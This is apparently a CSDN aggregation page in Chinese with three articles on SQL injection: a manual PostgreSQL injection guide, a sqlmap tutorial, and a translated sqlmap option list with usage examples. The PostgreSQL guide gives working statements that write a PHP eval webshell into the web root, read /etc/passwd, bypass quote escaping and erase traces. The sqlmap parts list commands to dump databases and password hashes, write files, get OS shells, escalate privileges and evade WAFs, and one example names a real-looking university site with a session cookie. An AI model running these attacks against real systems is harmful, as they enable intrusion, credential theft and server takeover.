php shell连接数据库读取数据_shell中读取数据库连接信息 - CSDN
精华内容
参与话题
  • SQL手工注入基础详解---- postgresql篇

    万次阅读 2012-05-30 10:52:38
    不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。 关于PostgreSQL

    来源:邪恶八进制信息安全团队

    文章作者:x2bug
    一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。
    关于PostgreSQL
    PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据库管理系统。
    了解PostgreSQL
    1.同其他数据库一致,SQL语句基本一致
    2.支持/*、/**/、–注释,;和\g表示语句结束
    3.使用||可以连接字符串(类似于mssql中的+),同时需要注意特殊字符被转义
    4.无法自动匹配字段
    5.web管理程序为phpPgAdmin
    6.开放的默认端口为5432
    注入PostgreSQL
    1.内置函数
    通过一些内置函数我们可以获取到很多关于数据库的信息,简单列举下比较有价值的函数:
    current_database() //当前数据库名
    session_user   //会话用户
    current_user   //当前数据库用户
    2.如何读取表与字段、内容
    一般我们都先回手工猜测数据库中的表和字段,但如果猜测不到也没有关系,这并不是access数据库,可以通过一些数据库本身存在的表与字段读取所有表和字段,如mysql中会表所有表和字段放入一个预定的库中。在PostgreSQL在让我们读取这些信息也提供了方便,数据库可以通过pg_stat_user_tables来依次读取,另外information_schema.columns也给我们一样提供了方便,让我们可以读取数据库表和字段,其次还有pg_user、pg_group、pg_shadow都能返回给我们很多有用的信息,记得oid也能让我们获取到这些信息,不过记不太清楚了,如此多的途径相信在获取表或字段这些你都不会有问题了。读取内容的时候我们也同样可以根据ID来依次数据。我曾经遇见过一个PostgreSQL+php网站,由于magic_quotes_gpc=on的问题,又找不到id类的标识可以让我去读取表中其他内容,这个时候除此之外通过limit n offse n读取到了表中所有内容,其实它真的很不错。
    3.读、写文件
    通过数据库写文件来获取webshell是最为直接的方式了,不需要找后台,也不需要找上传漏洞,甚至我们可以通过数据库来直接获取到服务器的hash值进行破解,简直给我们带来了太多的方便。如何写文件呢?
    create table file(shell text not null);   //创建表和字段
    insert into file values(‘<?php eval($_POST[cmd]);?>’);   //写入代码到数据库
    copy file(shell) to ‘/var/www/html/shell.php’;   //导出文件
    通过上面三个语句我们就可以轻松的获取到一句话,执行这些我想不是一问题,通过;或构造其他语句都可以实现,最后记得删除执行drop table file来删除痕迹。一篇文中曾提到过更简单的方法
    copy (select ‘<?php eval($_POST[cmd]);?>’) to ‘/var/www/html/shell.php’
    一句话就直接搞定,不过未曾测试这句话的可行性。在没有写入文件权限的时候可以尝试下读取文件,看看如何构造读取文件的语句吧?
    create table file(file text not null);   //创建表和字段
    copy file (file) from ‘/etc/passwd’;   //复制文件内容到字段中
    select * from file; //查询
    也可以通过这个来读取网站配置文件来获取数据库呢,真的很方便。另外PostgreSQL新版本中也提供了很多的函数,如:pg_read_file(‘/etc/passwd’,1,20)可以直接读取文件内容,类似于此函数还有:pg_file_write(filename,text,bool)、pg_read_file(filename,pos,length)、pg_ls_dir(dirname)等,不过这些函数常被管理员因为安全考虑而删除,这就看运气了。
    4.如何绕过”\”转义(引号)
    如果PHP中开启了magic_quotes_gpc=on,那么很悲剧的是一些符号将会被转义,如执行select pass from member where name=”admin”,最后的语句执行时为:select pass from member where name=\”admin\”,这样就无法达到我们想要的结构了。其他数据库我们尝是通过hex、char编码来解决这个问题,而在PostgreSQL中除此也给我们提供了一种新的方法来绕过。在语句中,允许我们通过$和$之间来绕过引号的转义或者过滤问题,可以改写成这样:select pass from member where name=$admin$,如此就成功的绕过了引号问题。
    至此,你应该对PostgreSQL的注入了解不少了,操作上应该不是问题了。其次我想说的是在这个数据库类型中注入方法不仅仅于此,以后再说说吧!真的很强大。

    展开全文
  • Sqlmap使用教程【个人笔记精华整理】

    万次阅读 多人点赞 2018-08-28 11:01:42
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的...

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。

    今天把我一直以来整理的sqlmap笔记发布上来供大家参考。

    sqlmap教程

    教程说明

    学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。

    我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】

    针对sqlmap注入过waf,可以参考:sqlmap注入之tamper绕过WAF防火墙过滤

    sqlmap简介

    sqlmap支持五种不同的注入模式:

    • 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
    • 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
    • 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
    • 4、联合查询注入,可以使用union的情况下的注入。
    • 5、堆查询注入,可以同时执行多条语句的执行时的注入。

    sqlmap支持的数据库有

    MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

    检测注入

    基本格式

    sqlmap -u “http://www.vuln.cn/post.php?id=1”

    默认使用level1检测全部数据库类型

    sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

    指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

    跟随302跳转

    当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302,
    当注入错误的时候,先报错再跳转的时候,不需要跟随302。
    目的就是:要追踪到错误信息。

    cookie注入

    当程序有防get注入的时候,可以使用cookie注入
    sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)

    从post数据包中注入

    可以使用burpsuite或者temperdata等工具来抓取post包

    sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

    注入成功后

    获取数据库基本信息

    sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 –dbs

    查询有哪些数据库

    sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test –tables

    查询test数据库中有哪些表

    sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin –columns

    查询test数据库中admin表有哪些字段

    sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

    dump出字段username与password中的数据

    其他命令参考下面

    从数据库中搜索字段

    sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password
    在dedecms数据库中搜索字段admin或者password。

    读取与写入文件

    首先找需要网站的物理路径,其次需要有可写或可读权限。

    –file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
    –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
    –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
    #示例:
    sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

    使用shell命令:

    sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
    接下来指定网站可写目录:
    “E:\php\htdocs\dvwa”

    #注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)

    sqlmap详细命令:

    • –is-dba 当前用户权限(是否为root权限)
    • –dbs 所有数据库
    • –current-db 网站当前数据库
    • –users 所有数据库用户
    • –current-user 当前数据库用户
    • –random-agent 构造随机user-agent
    • –passwords 数据库密码
    • –proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
    • –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)

    ——————————————————————————————————

    Options(选项):

    • –version 显示程序的版本号并退出
    • -h, –help 显示此帮助消息并退出
    • -v VERBOSE 详细级别:0-6(默认为1)
    • 保存进度继续跑:

    sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度
    sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度

    Target(目标):

    以下至少需要设置其中一个选项,设置目标URL。

    • -d DIRECT 直接连接到数据库。
    • -u URL, –url=URL 目标URL。
    • -l LIST 从Burp或WebScarab代理的日志中解析目标。
    • -r REQUESTFILE 从一个文件中载入HTTP请求。
    • -g GOOGLEDORK 处理Google dork的结果作为目标URL。
    • -c CONFIGFILE 从INI配置文件中加载选项。

    Request(请求):

    这些选项可以用来指定如何连接到目标URL。

    • –data=DATA 通过POST发送的数据字符串
    • –cookie=COOKIE HTTP Cookie头
    • –cookie-urlencode URL 编码生成的cookie注入
    • –drop-set-cookie 忽略响应的Set – Cookie头信息
    • –user-agent=AGENT 指定 HTTP User – Agent头
    • –random-agent 使用随机选定的HTTP User – Agent头
    • –referer=REFERER 指定 HTTP Referer头
    • –headers=HEADERS 换行分开,加入其他的HTTP头
    • –auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
    • –auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
    • –auth-cert=ACERT HTTP认证证书(key_file,cert_file)
    • –proxy=PROXY 使用HTTP代理连接到目标URL
    • –proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
    • –ignore-proxy 忽略系统默认的HTTP代理
    • –delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
    • –timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
    • –retries=RETRIES 连接超时后重新连接的时间(默认3)
    • –scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
    • –safe-url=SAFURL 在测试过程中经常访问的url地址
    • –safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL

    Enumeration(枚举):

    这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行
    您自己的SQL语句。

    • -b, –banner 检索数据库管理系统的标识
    • –current-user 检索数据库管理系统当前用户
    • –current-db 检索数据库管理系统当前数据库
    • –is-dba 检测DBMS当前用户是否DBA
    • –users 枚举数据库管理系统用户
    • –passwords 枚举数据库管理系统用户密码哈希
    • –privileges 枚举数据库管理系统用户的权限
    • –roles 枚举数据库管理系统用户的角色
    • –dbs 枚举数据库管理系统数据库
    • -D DBname 要进行枚举的指定数据库名
    • -T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
    • –tables 枚举的DBMS数据库中的表
    • –columns 枚举DBMS数据库表列
    • –dump 转储数据库管理系统的数据库中的表项
    • –dump-all 转储所有的DBMS数据库表中的条目
    • –search 搜索列(S),表(S)和/或数据库名称(S)
    • -C COL 要进行枚举的数据库列
    • -U USER 用来进行枚举的数据库用户
    • –exclude-sysdbs 枚举表时排除系统数据库
    • –start=LIMITSTART 第一个查询输出进入检索
    • –stop=LIMITSTOP 最后查询的输出进入检索
    • –first=FIRSTCHAR 第一个查询输出字的字符检索
    • –last=LASTCHAR 最后查询的输出字字符检索
    • –sql-query=QUERY 要执行的SQL语句
    • –sql-shell 提示交互式SQL的shell

    Optimization(优化):

    这些选项可用于优化SqlMap的性能。

    • -o 开启所有优化开关
    • –predict-output 预测常见的查询输出
    • –keep-alive 使用持久的HTTP(S)连接
    • –null-connection 从没有实际的HTTP响应体中检索页面长度
    • –threads=THREADS 最大的HTTP(S)请求并发量(默认为1)

    Injection(注入):

    这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。

    • -p TESTPARAMETER 可测试的参数(S)
    • –dbms=DBMS 强制后端的DBMS为此值
    • –os=OS 强制后端的DBMS操作系统为这个值
    • –prefix=PREFIX 注入payload字符串前缀
    • –suffix=SUFFIX 注入payload字符串后缀
    • –tamper=TAMPER 使用给定的脚本(S)篡改注入数据

    Detection(检测):

    这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

    • –level=LEVEL 执行测试的等级(1-5,默认为1)
    • –risk=RISK 执行测试的风险(0-3,默认为1)
    • –string=STRING 查询时有效时在页面匹配字符串
    • –regexp=REGEXP 查询时有效时在页面匹配正则表达式
    • –text-only 仅基于在文本内容比较网页

    Techniques(技巧):

    这些选项可用于调整具体的SQL注入测试。

    • –technique=TECH SQL注入技术测试(默认BEUST)
    • –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
    • –union-cols=UCOLS 定列范围用于测试UNION查询注入
    • –union-char=UCHAR 用于暴力猜解列数的字符

    Fingerprint(指纹):

    • -f, –fingerprint 执行检查广泛的DBMS版本指纹

    Brute force(蛮力):

    这些选项可以被用来运行蛮力检查。

    • –common-tables 检查存在共同表
    • –common-columns 检查存在共同列

    User-defined function injection(用户自定义函数注入):
    这些选项可以用来创建用户自定义函数。

    –udf-inject 注入用户自定义函数
    –shared-lib=SHLIB 共享库的本地路径

    File system access(访问文件系统):

    这些选项可以被用来访问后端数据库管理系统的底层文件系统。

    • –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
    • –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
    • –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

    Operating system access(操作系统访问):

    这些选项可以用于访问后端数据库管理系统的底层操作系统。

    • –os-cmd=OSCMD 执行操作系统命令
    • –os-shell 交互式的操作系统的shell
    • –os-pwn 获取一个OOB shell,meterpreter或VNC
    • –os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
    • –os-bof 存储过程缓冲区溢出利用
    • –priv-esc 数据库进程用户权限提升
    • –msf-path=MSFPATH Metasploit Framework本地的安装路径
    • –tmp-path=TMPPATH 远程临时文件目录的绝对路径

    Windows注册表访问:

    这些选项可以被用来访问后端数据库管理系统Windows注册表。

    • –reg-read 读一个Windows注册表项值
    • –reg-add 写一个Windows注册表项值数据
    • –reg-del 删除Windows注册表键值
    • –reg-key=REGKEY Windows注册表键
    • –reg-value=REGVAL Windows注册表项值
    • –reg-data=REGDATA Windows注册表键值数据
    • –reg-type=REGTYPE Windows注册表项值类型

    这些选项可以用来设置一些一般的工作参数。

    • -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
    • -s SESSIONFILE 保存和恢复检索会话文件的所有数据
    • –flush-session 刷新当前目标的会话文件
    • –fresh-queries 忽略在会话文件中存储的查询结果
    • –eta 显示每个输出的预计到达时间
    • –update 更新SqlMap
    • –save file保存选项到INI配置文件
    • –batch 从不询问用户输入,使用所有默认配置。

    Miscellaneous(杂项):

    • –beep 发现SQL注入时提醒
    • –check-payload IDS对注入payloads的检测测试
    • –cleanup SqlMap具体的UDF和表清理DBMS
    • –forms 对目标URL的解析和测试形式
    • –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
    • –page-rank Google dork结果显示网页排名(PR)
    • –parse-errors 从响应页面解析数据库管理系统的错误消息
    • –replicate 复制转储的数据到一个sqlite3数据库
    • –tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
    • –wizard 给初级用户的简单向导界面
    展开全文
  • sqlmap命令行参数翻译与常见用法

    万次阅读 2020-08-21 17:51:09
    声明 很久以前收集的,最近有研究sql注入的想法,所以贴出以备...-d DIRECT 直接连接数据库。 -u URL, –url=URL 目标 URL。 -l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。 -r REQUESTFILE 从一个文件中

    声明

    很久以前收集的,最近有研究sql注入的想法,所以贴出以备不时之需。

    具体参数翻译

    –version 显示程序的版本号并退出
    -h, –help 显示此帮助消息并退出
    -v VERBOSE 详细级别:0-6(默认为 1)
    Target(目标):
    以下至少需要设置其中一个选项,设置目标 URL。
    -d DIRECT 直接连接到数据库。
    -u URL, –url=URL 目标 URL。
    -l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。
    -r REQUESTFILE 从一个文件中载入 HTTP 请求。
    -g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。
    -c CONFIGFILE 从 INI 配置文件中加载选项。
    Request(请求)::
    这些选项可以用来指定如何连接到目标 URL。
    –data=DATA 通过 POST 发送的数据字符串
    –cookie=COOKIE HTTP Cookie 头
    –cookie-urlencode URL 编码生成的 cookie 注入
    –drop-set-cookie 忽略响应的 Set –Cookie 头信息
    –user-agent=AGENT 指定 HTTP User –Agent 头
    –random-agent 使用随机选定的 HTTP User-Agent 头
    –referer=REFERER 指定 HTTP Referer 头
    –headers=HEADERS 换行分开,加入其他的 HTTP 头
    –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)(Basic, Digest or NTLM)
    –auth-cred=ACRED HTTP 身份验证凭据(用户名: 密码)
    –auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
    –proxy=PROXY 使用 HTTP 代理连接到目标 URL
    –proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
    –ignore-proxy 忽略系统lu默认的 HTTP 代理
    –delay=DELAY 在每个 HTTP 请求之间的延迟时间,单位为秒
    –timeout=TIMEOUT 等待连接超时的时间(默认为 30 秒)
    –retries=RETRIES 连接超时后重新连接的时间(默认 3)
    –scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
    –safe-url=SAFURL 在测试过程中经常访问的 url 地址
    –safe-freq=SAFREQ 两次访问之间测试请求,给出安全的 URL
    Optimization(优化):
    这些选项可用于优化 sqlmap 的性能。
    -o 开启所有优化开关
    –predict-output 预测常见的查询输出
    –keep-alive 使用持久的 HTTP(S) 连接
    –null-connection 从没有实际的 HTTP 响应体中检索页面长度
    –threads=THREADS 最大的 HTTP(S) 请求并发量(默认为 1)
    Injection(注入):
    这些选项可以用来指定测试哪些参数,提供自定义的注入 payloads 和可选篡改脚本。
    -p TESTPARAMETER 可测试的参数
    –dbms=DBMS 强制后端的 DBMS 为此值
    –os=OS 强制后端的 DBMS 操作系统为这个值
    –prefix=PREFIX 注入 payload 字符串前缀
    –suffix=SUFFIX 注入 payload 字符串后缀
    –tamper=TAMPER 使用给定的脚本篡改注入数据
    –tamper 通过编码绕过 WEB 防火墙(WAF)sqlmap 默认用 char()
    –tamper 插件所在目录 \ sqlmap-dev\tamper
    apostrophemask 用 UTF-8 全角字符替换单引号字符
    apostrophenullencode 用非法双字节 unicode 字符替换单引号字符
    appendnullbyte 在 payload 末尾添加空字符编码
    base64encode 对给定的 payload 全部字符使用 Base64 编码
    between 分别用 “NOT BETWEEN 0 AND #” 替换大于号 “>”,“BETWEEN # AND #” 替换等于号“=”
    bluecoat 在 SQL 语句之后用有效的随机空白符替换空格符,随后用 “LIKE” 替换等于号“=”
    chardoubleencode 对给定的 payload 全部字符使用双重 URL 编码(不处理已经编码的字符)
    charencode 对给定的 payload 全部字符使用 URL 编码(不处理已经编码的字符)
    charunicodeencode 对给定的 payload 的非编码字符使用 Unicode URL 编码(不处理已经编码的字符)
    concat2concatws 用 “CONCAT_WS(MID(CHAR(0), 0, 0), A, B)” 替换像 “CONCAT(A, B)” 的实例
    equaltolike 用 “LIKE” 运算符替换全部等于号“=”
    greatest 用 “GREATEST” 函数替换大于号“>”
    halfversionedmorekeywords 在每个关键字之前添加 MySQL 注释
    ifnull2ifisnull 用 “IF(ISNULL(A), B, A)” 替换像 “IFNULL(A, B)” 的实例
    lowercase 用小写值替换每个关键字字符
    modsecurityversioned 用注释包围完整的查询
    modsecurityzeroversioned 用当中带有数字零的注释包围完整的查询
    multiplespaces 在 SQL 关键字周围添加多个空格
    nonrecursivereplacement 用 representations 替换预定义 SQL 关键字,适用于过滤器
    overlongutf8 转换给定的 payload 当中的所有字符
    percentage 在每个字符之前添加一个百分号
    randomcase 随机转换每个关键字字符的大小写
    randomcomments 向 SQL 关键字中插入随机注释
    securesphere 添加经过特殊构造的字符串
    sp_password 向 payload 末尾添加 “sp_password” for automatic obfuscation from DBMS logs
    space2comment 用 “/**/” 替换空格符
    space2dash 用破折号注释符 “–” 其次是一个随机字符串和一个换行符替换空格符
    space2hash 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符
    space2morehash 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符
    space2mssqlblank 用一组有效的备选字符集当中的随机空白符替换空格符
    space2mssqlhash 用磅注释符 “#” 其次是一个换行符替换空格符
    space2mysqlblank 用一组有效的备选字符集当中的随机空白符替换空格符
    space2mysqldash 用破折号注释符 “–” 其次是一个换行符替换空格符
    space2plus 用加号 “+” 替换空格符
    space2randomblank 用一组有效的备选字符集当中的随机空白符替换空格符
    unionalltounion 用 “UNION SELECT” 替换“UNION ALL SELECT”
    unmagicquotes 用一个多字节组合 %bf%27 和末尾通用注释一起替换空格符
    varnish 添加一个 HTTP 头 “X-originating-IP” 来绕过 WAF
    versionedkeywords 用 MySQL 注释包围每个非函数关键字
    versionedmorekeywords 用 MySQL 注释包围每个关键字
    xforwardedfor 添加一个伪造的 HTTP 头 “X-Forwarded-For” 来绕过 WAF
    Detection(检测):
    这些选项可以用来指定在 SQL 盲注时如何解析和比较 HTTP 响应页面的内容。
    –level=LEVEL 执行测试的等级(1-5,默认为 1)
    –risk=RISK 执行测试的风险(0-3,默认为 1)
    –string=STRING 查询有效时在页面匹配字符串
    –regexp=REGEXP 查询有效时在页面匹配正则表达式
    –text-only 仅基于文本内容比较网页
    这些选项可用于调整具体的 SQL 注入测试。
    –technique=TECH SQL 注入技术测试(默认 BEUST)
    Techniques(技巧):
    –technique /* 测试指定注入类型 \ 使用的技术
    不加参数默认测试所有注入技术:
    B: 基于布尔的 SQL 盲注
    E: 基于显错 sql 注入
    U: 基于 UNION 注入
    S: 叠层 sql 注入
    T: 基于时间盲注
    –time-sec=TIMESEC DBMS 响应的延迟时间(默认为 5 秒)
    –union-cols=UCOLS 定列范围用于测试 UNION 查询注入
    –union-char=UCHAR 用于暴力猜解列数的字符
    Fingerprint(指纹):
    -f, –fingerprint 执行检查广泛的 DBMS 版本指纹
    Enumeration(枚举):
    这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的 SQL 语句。
    -b, –banner 检索数据库管理系统的标识
    –current-user 检索数据库管理系统当前用户
    –current-db 检索数据库管理系统当前数据库
    –is-dba 检测 DBMS 当前用户是否 DBA
    –users 枚举数据库管理系统用户
    –passwords 枚举数据库管理系统用户密码哈希
    –privileges 枚举数据库管理系统用户的权限
    –roles 枚举数据库管理系统用户的角色
    –dbs 枚举数据库管理系统数据库
    –tables 枚举 DBMS 数据库中的表
    –columns 枚举 DBMS 数据库表列
    –dump 转储数据库管理系统的数据库中的表项
    –dump-all 转储所有的 DBMS 数据库表中的条目
    –search 搜索列,表和 / 或数据库名称
    -D DB 要进行枚举的数据库名
    -T TBL 要进行枚举的数据库表
    -C COL 要进行枚举的数据库列
    -U USER 用来进行枚举的数据库用户
    –exclude-sysdbs 枚举表时排除系统数据库
    –start=LIMITSTART 第一个查询输出进入检索
    –stop=LIMITSTOP 最后查询的输出进入检索
    –first=FIRSTCHAR 第一个查询输出字的字符检索
    –last=LASTCHAR 最后查询的输出字字符检索
    –sql-query=QUERY 要执行的 SQL 语句
    –sql-shell 提示交互式 SQL 的 shell
    Brute force(蛮力):
    这些选项可以被用来运行蛮力检查。
    –common-tables 检查存在共同表
    –common-columns 检查存在共同列
    User-defined function injection(用户自定义函数注入):
    这些选项可以用来创建用户自定义函数。
    –udf-inject 注入用户自定义函数
    –shared-lib=SHLIB 共享库的本地路径
    File system access(访问文件系统):
    这些选项可以被用来访问后端数据库管理系统的底层文件系统。
    –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
    –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
    –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
    Operating system access(操作系统访问):
    这些选项可以用于访问后端数据库管理系统的底层操作系统。
    –os-cmd=OSCMD 执行操作系统命令
    –os-shell 交互式的操作系统的 shell
    –os-pwn 获取一个 OOB shell,meterpreter 或 VNC
    –os-smbrelay 一键获取一个 OOB shell,meterpreter 或 VNC
    –os-bof 存储过程缓冲区溢出利用
    –priv-esc 数据库进程用户权限提升
    –msf-path=MSFPATH Metasploit Framework 本地的安装路径
    –tmp-path=TMPPATH 远程临时文件目录的绝对路径
    Windows 注册表访问:
    这些选项可以被用来访问后端数据库管理系统 Windows 注册表。
    –reg-read 读一个 Windows 注册表项值
    –reg-add 写一个 Windows 注册表项值数据
    –reg-del 删除 Windows 注册表键值
    –reg-key=REGKEY Windows 注册表键
    –reg-value=REGVAL Windows 注册表项值
    –reg-data=REGDATA Windows 注册表键值数据
    –reg-type=REGTYPE Windows 注册表项值类型
    General(一般):
    这些选项可以用来设置一些一般的工作参数。
    -t TRAFFICFILE 记录所有 HTTP 流量到一个文本文件中
    -s SESSIONFILE 保存和恢复检索会话文件的所有数据
    –flush-session 刷新当前目标的会话文件
    –fresh-queries 忽略在会话文件中存储的查询结果
    –eta 显示每个输出的预计到达时间
    –update 更新 SqlMap
    –save file 保存选项到 INI 配置文件
    –batch 从不询问用户输入,使用所有默认配置。
    Miscellaneous(杂项):
    –beep 发现 SQL 注入时提醒
    –check-payload IDS 对注入 payloads 的检测测试
    –cleanup sqlmap 具体的 UDF 和表清理 DBMS
    –forms 对目标 URL 的解析和测试形式
    –gpage=GOOGLEPAGE 从指定的页码使用谷歌 dork 结果
    –page-rank Google dork 结果显示网页排名(PR)
    –parse-errors 从响应页面解析数据库管理系统的错误消息
    –replicate 复制转储的数据到一个 sqlite3 数据库
    –tor 使用默认的 Tor(Vidalia/ Privoxy/ Polipo)代理地址
    –wizard 给初级用户的简单向导界面

    基本用法

    sqlmap sqlmap -u “http://www.xxx.com” // 查是否有注入,一些基本信息
    sqlmap -u “http://www.xxx.com” --dbs // 枚举数据库
    sqlmap sqlmap -u “http://www.xxx.com” --tables // 表名枚举
    sqlmap sqlmap -u “http://www.xxx.com” --columns -T 数据库表名 // 字段枚举
    sqlmap sqlmap -u “http://www.xxx.com” --dump -T 数据库表名 -C “字段 1,字段 2,字段 3” //dump
    sqlmap -u “http://www.xxx.com” --dump -D 数据库名 -T 表名 -C “字段名 1,字段名 2,字段名 3” //dump
    读取数据库—> 读取表—-> 读取表的列—-> 获取内容
    sqlmap -u “http://jxpt.cuit.edu.cn/meol/common/inform/message_content.jsp?nid=419205” -p “nid” --cookie “JSESSIONID=EC114ABC4B90D3CB1FC79874ABB5E9C6”//cookie注入
    sqlmap -u http://xxx.xxx.com/Login.asp --data “n=1&p=1” //post注入
    sqlmap -r “包文件路径” -p 注入点 //可以吧http包保存成txt文件就可以测试多个post注入点
    sqlmap -u 注入点 --current-user # /*获取当前用户名称
    sqlmap -u 注入点 --current-db # /*获取当前数据库名称
    sqlmap -u 注入点 -D “数据库名” -T “表名” --tables
    sqlmap -u 注入点 -D “数据库名” -T “表名” --columns
    sqlmap -u 注入点 -D “数据库名” -T “表名” -C “字段” --dump
    sqlmap -u 注入点 --file-read “文件名”#读取文件load_file()
    sqlmap -u 注入点 --is-dba #是否是数据库管理员
    sqlmap -u 注入点 --passwords #数据库用户密码
    sqlmap -u 注入点 --current-user # /*获取当前用户名称

    初级用法

    sqlmap -u “http://url/news?id=1” –dbs / 查询是什么数据库
    sqlmap -u “http://url/news?id=1” –current-db / 获取当前数据库名称
    sqlmap -u “http://url/news?id=1” –current-user / 获取当前用户名称
    sqlmap -u “http://url/news?id=1” -D DataName –tables / 获取 DataName 数据库的表
    sqlmap -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 /* 列字段
    sqlmap -u “http://url/news?id=1” -D DataName –T TableNamen –C “admin,password” –dump -v 0 / 获取字段数据
    sqlmap -u “http://url/news?id=1” –dbms “Mysql” / 指定数据库类型
    sqlmap -u “http://url/news?id=1” –users / 列数据库用户
    sqlmap -u “http://url/news?id=1” –passwords / 获取数据库用户密码
    sqlmap -u “http://url/news?id=1” –passwords -U root -v 0 / 列出指定用户数据库密码
    sqlmap -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20 / 列出指定字段,列出 20 条
    sqlmap -u “http://url/news?id=1” –dump-all -v 0 / 列出所有数据库所有表
    sqlmap -u “http://url/news?id=1” –privileges / 查看权限
    sqlmap -u “http://url/news?id=1” –privileges -U root / 查看指定用户权限
    sqlmap -u “http://url/news?id=1” –is-dba -v 1 / 是否是数据库管理员
    sqlmap -u “http://url/news?id=1” –roles / 枚举数据库用户角色
    sqlmap -u “http://url/news?id=1” –udf-inject / 导入用户自定义函数(获取 系统权限!)
    sqlmap -u “http://url/news?id=1” –dump-all –exclude-sysdbs -v 0 / 列出当前库所有表
    sqlmap -u “http://url/news?id=1” –union-cols /union 查询表记录
    sqlmap -u “http://url/news?id=1” –cookie “COOKIE_VALUE” /cookie 注入
    sqlmap -u “http://url/news?id=1” -b(–banner) / 获取 banner 信息
    sqlmap -u “http://url/news?id=1” –data “id=3” /post 注入
    sqlmap -u “http://url/news?id=1” -v 1 -f / 指纹判别数据库类型
    sqlmap -u “http://url/news?id=1” –proxy “http://127.0.0.1:8118” / 代理注入
    sqlmap -u “http://url/news?id=1” –string “STRING_ON_TRUE_PAGE” / 指定关键词
    sqlmap -u “http://url/news?id=1” –sql-shell / 执行指定 sql 命令
    sqlmap -u “http://url/news?id=1” –file /etc/passwd
    sqlmap -u “http://url/news?id=1” –os-cmd=whoami / 执行系统命令
    sqlmap -u “http://url/news?id=1” –os-shell / 系统交互 shell
